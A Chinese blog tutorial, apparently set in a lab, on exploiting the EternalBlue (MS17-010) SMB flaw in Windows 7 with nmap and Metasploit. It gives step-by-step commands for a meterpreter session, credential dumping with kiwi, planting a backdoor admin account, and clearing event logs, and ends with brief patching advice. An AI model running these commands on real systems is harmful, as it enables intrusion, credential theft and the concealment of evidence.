永恒之蓝漏洞利用攻击以及修复方法

已于 2022-03-03 16:12:05 修改
阅读量6.9k 收藏 36
点赞数
分类专栏: 已有的事后必再有 文章标签: 安全 web安全 网络
于 2021-12-12 17:49:59 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Gjqhs/article/details/121882010
版权
  • 靶机:Windows 7(有的版本有补丁)
  • 攻击机:Kali 2021
  • 首先保证可以互相ping 通
  • 32位系统进去控制台会蓝屏

漏洞利用

用nmap的漏洞扫描模式,扫描过程按上下方向键即可查看扫描进度,这可能需要一点时间。

nmap --script=vuln window7ip

可以发现,靶机上扫到了4个漏洞,其中包括了永恒之蓝。

如果系统版本较高就像这样,没有ms17 -10

打开metasploit,今天怎么是个心形,作为单身狗我哭了。。。

msfconsole


搜索ms17-010相关模块,可以看到一共找到了6个不同的模块

search ms17-010


加载扫描第一个模块

use auxiliary/scanner/smb/smb_ms17_010

查看配置选项

show options


 set rhosts显示远程主机未配置,配置目标主机。

   set rhosts window7

rhosts => 192.168.178.128

再次扫描漏洞,确认靶机存在MS17-010漏洞。

exploit

在这里插入图片描述
使用永恒之蓝攻击模块:exploit/windows/smb/ms17_010_eternalblue
并设置攻击载荷:

set payload

在这里插入图片描述
查看选项并设置rhosts:

set rhosts 192.168.178.128

输入exploit开始攻击。

出现meterpreter >就说明已经成功了,Meterpreter 是 Metasploit 的一个扩展模块,可以调用 Metasploit 的一些功能,对目标系统进行更深入的渗透,如获取屏幕、上传/下载文件、创建持久后门等。

演示几个功能

  1. 捕获屏幕
 meterpreter > screenshot


  1. 上传/下载文件
meterpreter > upload hello.txt c://

在这里插入图片描述

meterpreter > download d://1.txt

meterpreter > run vnc

获取cmd

meterpreter > shell
  1. 获取用户密码
meterpreter > load kiwi 
Loading extension kiwi...Success.

进行后门植入(创建新的管理员账户)

      net user hack 123456 /add        //在windows 7上创建一个hack的用户,以便下次访问

      net localgroup administrators hack /add     //将hack加入到windows 7的本地管理员组中,以便获得更大权限
 

记得清除日志(靶机的事件查看器记录了大量的事件,需要消除痕迹)

meterpreter > clearev




修复方法

受害版本参照:点我进入查看

  • 关闭445端口。
  • 打开防火墙,安装安全软件。
  • 安装对应补丁。
告诉桃花不用开了
关注
  • 0
    点赞
  • 36
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
永恒之蓝漏洞
ZXT02的博客
12-21 1006
仅限学习使用!!!
MS17-010(永恒之蓝漏洞分析与复现
热门推荐
未完成的歌~的博客
03-12 6万+
文章目录一、漏洞简介1、永恒之蓝介绍:2、漏洞原理:3、影响版本:二、漏洞复现复现环境:复现过程:1、主机发现:2、使用MSF的永恒之蓝漏洞模块3、使用ms17-010扫描模块,对靶机进行扫描:4、使用ms17-010攻击模块,对靶机进行攻击5、得到靶机shell6、通过shell对靶机进行控制 一、漏洞简介 1、永恒之蓝介绍: 永恒之蓝漏洞(MS17-010),它的爆发源于 WannaCry 勒索病毒的诞生,该病毒是不法分子利用NSA(National Security Agency,美国国家安全局)泄露
永恒之蓝漏洞原理/永恒之蓝 MS17-010漏洞复现_零基础渗透指南
最新发布
程序员三九的博客
06-25 611
利用Metasploit中针对ms17-101漏洞攻击载荷进行攻击获取主机控制权限,是一种使用MSF 实现 “永恒之蓝”的快速攻击
基础渗透测试实验—永恒之蓝漏洞复现
G6_12的博客
06-08 4072
ms17-010,永恒之蓝漏洞复现
永恒之蓝(MS17-010)漏洞复现
tubug的博客
05-21 5712
2017 年 4 月 14 日晚,黑客团体 Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用 Windows 系统的 SMB 漏洞可以获取系统最高权限。5 月 12 日,不法分子通过改造“永恒之蓝”制作了 wannacry 勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网呾政府机构与网中招,被勒索支付高额赎金才能解密恢复文件。.........
EternalBlue【永恒之蓝漏洞详解(复现、演示、远程、后门、入侵、防御)内容丰富-深入剖析漏洞原理-漏洞成因-以及报错解决方法-值得收藏!
m0_73734159的博客
12-26 6186
2017年永恒之蓝漏洞,编号为ms17漏洞。现在只有一些低版本的电脑没有打ms17_010的补丁,windows7 以上版本几乎都没有这个漏洞了。虽然如此,此漏洞非常经典,现如今仍有很大的学习漏洞原理以及深入研究防御策略都有很大的借鉴和学习研究的意义。让大家可以对网络安全更加重视,网络安全刻不容缓,让我们为国家网络安全的建设共同努力!
msf渗透测试学习-与永恒之蓝漏洞案例
weixin_49349476的博客
06-08 4634
MSF是Metasploit Framework的缩写,是一款广泛使用的渗透测试工具,具有强大的攻击功能。它提供了一个模块化的平台,通过将各种攻击载荷、漏洞利用和辅助工具组装在一起,可用于模拟各种攻击,测试系统安全性,也可以用于执行红队实战训练、漏洞挖掘等工作。
永恒之蓝 (EternalBlue) 漏洞利用原理详解
volta_xu的博客
06-02 950
SMB(Server Message Block)协议是一种网络文件共享协议,主要用于文件和打印机共享。SMB协议允许客户端通过网络访问服务器上的文件、目录和其他资源。在Windows中,SMB协议是默认启用的,用于提供文件共享服务。
ms17-010(永恒之蓝漏洞复现与处理
diaobusi的博客
06-05 1万+
ms17_010 是一种操作系统漏洞,仅影响 Windows 系统中的 SMBv1 服务。这个漏洞是由于 SMBv1 内核函数中的缓冲区溢出而导致的。攻击者可以通过该漏洞控制目标系统,并执行任意代码。这个漏洞通过 445 文件共享端口进行利用,一旦攻击者成功利用该漏洞,就可以在目标主机上植入各种恶意软件,如勒索软件。最近出现的 WannaCry 勒索软件就使用 ms17_010 漏洞来传播和植入勒索代码,将目标系统中的所有文件加密并威胁用户付款。
永恒之蓝漏洞 ms17_010 详解
qq_45953122的博客
10-25 5860
永恒之蓝(ms17-010)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。不过在该病毒出来不久就被微软通过打补丁修复
永恒之蓝漏洞攻击
qq_54250695的博客
05-16 2073
使用方法 进入框架:msfconsole 使用sear kali ip: 采用nat的桥接模式: 保证kali和win7能够通信 nmap -sS -A win7ip (查看攻击对象win7所开放的所有端口) msfconsole (启动渗透框架) search ms17_010 (查看ms17_010模块工具) 选择攻击模块: use exploit/windows/smb/ms17_010_e...
渗透测试基础之永恒之蓝漏洞复现
记录开发和安全学习过程中的点点滴滴
09-08 1425
渗透测试(Penetration Testing)是指专业的安全测试人员模拟黑客攻击的行为,对目标系统进行主动攻击测试的过程。通过模拟攻击,渗透测试帮助企业评估其系统或网络安全性,发现潜在的安全漏洞和弱点,从而提供相应的防护措施和改进建议。渗透测试的目的是帮助组织发现和修复系统中的安全漏洞,以提升安全性和防御能力。每日一言。
网络安全】MS17-010“永恒之蓝漏洞的利用
qq_45748133的博客
01-06 1万+
导语 最近学期末进行网络安全实训,老师要求每个小组选择一个方向进行研究,本篇将讲述“永恒之蓝漏洞的简单利用。 一、实验原理 Eternalblue通过TCP端口445和139来利用SMBv1和NBT中的远程代码执行漏洞,恶意代码会扫描开放445文件共享端口的Windows机器,电脑只要开机,攻击者就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。 二、实验环境 三、实验记录 一次渗透的基本步骤 (1)启动kali虚机,进入root权限打开Metasploit渗透工具。 msfco
网络安全入门第一课—永恒之蓝(ms17-010)
m0_56088051的博客
07-13 6033
一、永恒之蓝(Eternal Blue)永恒之蓝相关病毒,其实是利用了微软的MS17-010漏洞。MS17-010是Windows系统一个底层服务的漏洞,恶意代码会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序二、实验环境。
网络攻防——永恒之蓝
weixin_46560512的博客
03-09 2万+
主要介绍永恒之蓝程序,即 windows7的SMB协议漏洞以及相关的攻击方式。
浅析ms17_010(永恒之蓝漏洞利用过程及防护措施
qq_24797991的博客
03-27 4071
永恒之蓝勒索病毒漏洞复现及防范
记录一次永恒之蓝(ms17-010)漏洞攻击 【后附msf常用命令】
向安全进发的博客
03-28 3888
永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。#执行一个已有的模块,这里要说的是输入run后按两下tab,会列出所有的已有的脚本,常用的有。
网络安全必学渗透测试流程
qq_44005305的博客
02-12 575
无论你是去B站或者是油管上面都有很多网络安全的相关视频可以学习,当然如果你还不知道选择那套学习,我这里也整理了一套和上述成长路线图挂钩的视频教程,完整版的视频已经上传至CSDN官方,朋友们如果需要可以点击这个链接免费领取。3、我们在第二步的时候使用的是auxiliary模块进行的漏洞检测,这回我们使用exploit模块进行漏洞利用。2、这里我们先选择#1的auxiliary(辅助模块)先进行踩点,查看漏洞是否可以利用,再去进行渗透攻击。1、第二步骤的时候检测到目标存在该漏洞,现在我们开始进行渗透。
网安尝鲜,永恒之蓝攻击Win7演示(超详细)
qq_64545050的博客
09-06 2471
使用kali 2022.3,Windows7 x64旗舰版进行攻击演示
如何防范永恒之蓝漏洞
07-27
永恒之蓝漏洞(EternalBlue)是一种影响微软Windows操作系统的漏洞,它被用于进行网络蠕虫攻击和远程代码执行。以下是一些防范永恒之蓝漏洞的建议措施: 1. 及时打补丁:安装并定期更新微软发布的安全补丁,包括修复永恒之蓝漏洞的相关补丁。确保操作系统和其他软件都是最新版本,以修复已知漏洞。 2. 使用防火墙:配置网络防火墙以限制对服务器和内部网络的访问,并阻止恶意流量进入网络。防火墙可以过滤掉可能包含永恒之蓝攻击代码的流量。 3. 强化访问控制:使用强密码策略,限制远程访问,禁用不必要的服务和端口,实施多因素身份验证等,以减少攻击者利用永恒之蓝漏洞进行远程攻击的可能性。 4. 网络隔离:将关键系统和敏感数据放置在独立的网络段中,并使用网络隔离技术(如虚拟局域网/VLAN)分隔网络,以减少受到攻击的风险。 5. 安全监控:使用入侵检测系统(IDS)和入侵防御系统(IPS)来监控网络流量,并检测和阻止潜在的永恒之蓝攻击行为。 6. 应用白名单和黑名单:限制可执行文件的运行,只允许运行经过授权的可信程序,以防止恶意软件利用永恒之蓝漏洞进行远程执行。 7. 安全培训和意识:对服务器管理员和用户进行安全培训,提高其对网络安全风险和最佳实践的认识。 综合采取这些措施可以帮助减少永恒之蓝漏洞对系统的威胁。然而,没有绝对安全的系统,持续的安全更新和监控仍然非常重要。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值